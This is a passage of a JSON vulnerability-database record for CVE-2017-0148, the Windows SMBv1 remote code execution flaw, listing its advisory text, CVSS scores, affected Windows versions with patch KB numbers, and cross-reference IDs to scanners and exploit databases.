"KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:41", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "7d21d22f517defccc35d772d05d77d29", "type": "mscve", "bulletinFamily": 
"microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-04T22:46:36", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, 
{"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": 
{"value": 7.3, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB4012213", "KB4012606", "KB4012216", "KB4012598", "KB4013198", "KB3212646", "KB4013429", "KB3213986", "KB3210720", "KBMS16-110, 3187754", "KB3210721", "KB3177186", "KB3205409", "KB4012212", "KB4012217", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for 
x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:46:36", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "8cf93b0e21b8d82dbbee6dec7e04b364", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T08:45:17", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4013198", "KB4012214", "KB3213986", "KB4012212", "KB3210721", "KB4012606", "KB4013429", 
"KB3210720", "KB3205409", "KB3212646", "KB3205401", "KB4012215", "KB4012598", "KB4012213", "KB4012217", "KB3177186", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:45:17", "differentElements": ["msAffectedSoftware"], "edition": 88}], "viewCount": 
112, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": 
"kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-06T10:49:13", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-06T10:49:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB4012215", "KB3205409", "KB4012216", "KB4012213", "KB3177186", "KB3213986", "KB4012217", "KB3205401", "KB4012212", "KB4012598", "KBMS16-110, 3187754", "KB4012214", "KB3210720", "KB3210721", "KB4013429", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 